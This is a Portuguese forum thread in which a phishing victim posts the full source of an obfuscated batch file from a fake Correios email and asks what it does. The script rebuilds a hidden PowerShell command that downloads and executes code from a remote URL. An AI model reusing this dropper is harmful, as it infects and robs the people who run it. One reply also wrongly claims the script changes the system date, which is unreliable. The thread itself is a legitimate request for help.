Ir ao conteúdo
  • Cadastre-se
lucasdharo

Como saber se o que executei era um virus?

Recommended Posts

Primeiramente boa tarde a todos.

 

Recebi um falso email dizendo ser dos correios(Um print do mesmo encontra-se em anexo.), por falta de atenção, ao não reparar no remetente do email, acabei clicando no link "Objeto", onde foi feito o download de um arquivo .RAR, e eu tive a capacidade de abrir o mesmo que continha um arquivo .CMD e eu abri ele, logo o prompt abriu e logo fechou!

Nesta altura do campeonato fui perceber que se tratava de algo errado, e não de um email verdadeiro do correios.

 

Após isto fiquei com receio de usar sites de bancos e etc, cliquei para editar o prompt e obtive o codigo dele, porém nao entendo nada de programação, vou postar o codigo dele:

 

@echo off
cd %SystemRoot%\System32
set bcirTx=b0FeW6C7SqPDJntiQhscrGzkwpIgNadMXVxojmyv83BEOKTU2LuflZ5YR9AH41
set DY=Win
set sSHoyh=do^w
set hcfFbVcL=^sP^o
set HcsobSBR=^we^r
set rFtqfDrk=^She
set jDCO=^l^l^\
set VgnSe=^v1^.
set OWuq=0\p^o
set UfEsA=w^e
set dbnlJFa=r^sh
set eQ=^e^ll
set YQJnm=^.^e^x
set BtXDt=^e ^-^n
set nlyctlG=^op 
set rMZMSm=-^w
set BlviZ=^in 1 ^-
set date=%bcirTx:~26,1%%bcirTx:~3,1%%bcirTx:~34,1%(^"%bcirTx:~26,1%%bcirTx:~3,1%%bcirTx:~34,1%(%bcirTx:~28,1%%bcirTx:~3,1%%bcirTx:~4,1%-%bcirTx:~35,1%b%bcirTx:~12,1%%bcirTx:~43,1%%bcirTx:~19,1%%bcirTx:~14,1% %bcirTx:~28,1%%bcirTx:~3,1%%bcirTx:~14,1%.%bcirTx:~4,1%%bcirTx:~3,1%b%bcirTx:~19,1%%bcirTx:~49,1%%bcirTx:~15,1%%bcirTx:~3,1%%bcirTx:~28,1%%bcirTx:~14,1%).%bcirTx:~11,1%%bcirTx:~44,1%%bcirTx:~4,1%%bcirTx:~13,1%%bcirTx:~49,1%%bcirTx:~35,1%%bcirTx:~58,1%%bcirTx:~11,1%%bcirTx:~18,1%%bcirTx:~14,1%%bcirTx:~56,1%%bcirTx:~26,1%%bcirTx:~13,1%%bcirTx:~21,1%('%bcirTx:~17,1%%bcirTx:~14,1%%bcirTx:~14,1%%bcirTx:~25,1%%bcirTx:~18,1%://%bcirTx:~30,1%%bcirTx:~52,1%%bcirTx:~37,1%.%bcirTx:~25,1%%bcirTx:~29,1%%bcirTx:~13,1%%bcirTx:~13,1%%bcirTx:~35,1%%bcirTx:~30,1%.%bcirTx:~19,1%%bcirTx:~35,1%%bcirTx:~37,1%/?%bcirTx:~30,1%%bcirTx:~37,1%%bcirTx:~52,1%%bcirTx:~15,1%%bcirTx:~18,1%%bcirTx:~16,1%%bcirTx:~4,1%%bcirTx:~42,1%%bcirTx:~29,1%%bcirTx:~9,1%%bcirTx:~26,1%%bcirTx:~45,1%%bcirTx:~40,1%%bcirTx:~53,1%%bcirTx:~14,1%%bcirTx:~42,1%%bcirTx:~3,1%%bcirTx:~40,1%%bcirTx:~25,1%%bcirTx:~45,1%%bcirTx:~46,1%%bcirTx:~31,1%%bcirTx:~6,1%%bcirTx:~8,1%%bcirTx:~27,1%%bcirTx:~25,1%%bcirTx:~56,1%%bcirTx:~3,1%%bcirTx:~33,1%%bcirTx:~32,1%%bcirTx:~17,1%%bcirTx:~53,1%%bcirTx:~61,1%%bcirTx:~45,1%%bcirTx:~15,1%%bcirTx:~15,1%%bcirTx:~55,1%%bcirTx:~43,1%%bcirTx:~26,1%%bcirTx:~54,1%%bcirTx:~3,1%%bcirTx:~41,1%%bcirTx:~51,1%%bcirTx:~18,1%%bcirTx:~6,1%%bcirTx:~26,1%%bcirTx:~49,1%%bcirTx:~32,1%%bcirTx:~29,1%%bcirTx:~41,1%%bcirTx:~2,1%%bcirTx:~36,1%%bcirTx:~34,1%%bcirTx:~56,1%%bcirTx:~47,1%%bcirTx:~36,1%%bcirTx:~30,1%%bcirTx:~36,1%%bcirTx:~18,1%%bcirTx:~38,1%%bcirTx:~56,1%%bcirTx:~44,1%%bcirTx:~8,1%%bcirTx:~18,1%%bcirTx:~44,1%%bcirTx:~8,1%%bcirTx:~44,1%%bcirTx:~9,1%%bcirTx:~36,1%%bcirTx:~20,1%%bcirTx:~36,1%b%bcirTx:~44,1%%bcirTx:~4,1%%bcirTx:~50,1%%bcirTx:~20,1%%bcirTx:~49,1%%bcirTx:~28,1%%bcirTx:~46,1%%bcirTx:~39,1%%bcirTx:~26,1%%bcirTx:~21,1%%bcirTx:~58,1%%bcirTx:~29,1%%bcirTx:~58,1%%bcirTx:~35,1%%bcirTx:~33,1%%bcirTx:~24,1%%bcirTx:~41,1%%bcirTx:~23,1%%bcirTx:~11,1%%bcirTx:~40,1%%bcirTx:~48,1%/%bcirTx:~4,1%%bcirTx:~20,1%%bcirTx:~26,1%%bcirTx:~10,1%%bcirTx:~58,1%b%bcirTx:~41,1%%bcirTx:~33,1%%bcirTx:~18,1%%bcirTx:~34,1%%bcirTx:~33,1%%bcirTx:~18,1%%bcirTx:~45,1%%bcirTx:~5,1%%bcirTx:~27,1%%bcirTx:~16,1%%bcirTx:~43,1%%bcirTx:~52,1%')^");
echo %%date%% | %DY%%sSHoyh%%hcfFbVcL%%HcsobSBR%%rFtqfDrk%%jDCO%%VgnSe%%OWuq%%UfEsA%%dbnlJFa%%eQ%%YQJnm%%BtXDt%%nlyctlG%%rMZMSm%%BlviZ%

 

O que devo fazer? 

Alguém poderia me ajudar com o que esse codigo faz?

 

desde Já Muito obrigado.

email.jpg

Compartilhar este post


Link para o post
Compartilhar em outros sites

Boa tarde.

 

O código executa um script PowerShell, sugiro que siga o procedimento abaixo.

 

Acesse o tópico abaixo, siga as instruções e abra um novo tópico na área de Remoção de Malwares:

 

  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Olá deve ser vírus sim, porque mais alguém iria se disfarçar de algo que não é e te iludir para executar um arquivo?

 

Não sou craque em arquivos batch mais parece que o código faz alguma modificação relacionado a data do computador.  Se tiver uma imagem do sistema salva em algum lugar eu recomendo usar ou um ponto de restauração de antes de executar o arquivo cmd.

 

Depois use um antivírus atualizado para fazer um escaneamento completo do computador.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Ciro-mota e ricardo_br, obrigado pelas orientações!

 

Criarei o tópico com o log do ZA Scan!

 

Att, Lucas de Haro.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar agora





Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×